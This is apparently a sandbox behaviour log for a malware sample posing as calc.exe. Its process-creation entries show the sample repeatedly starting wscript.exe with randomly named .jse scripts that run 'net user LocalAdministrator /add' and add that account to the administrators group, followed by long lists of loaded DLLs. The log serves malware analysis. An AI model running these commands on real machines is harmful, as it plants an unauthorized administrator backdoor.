Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" PZr1luuECN.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse

Source: C:\Users\user\Desktop\calc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
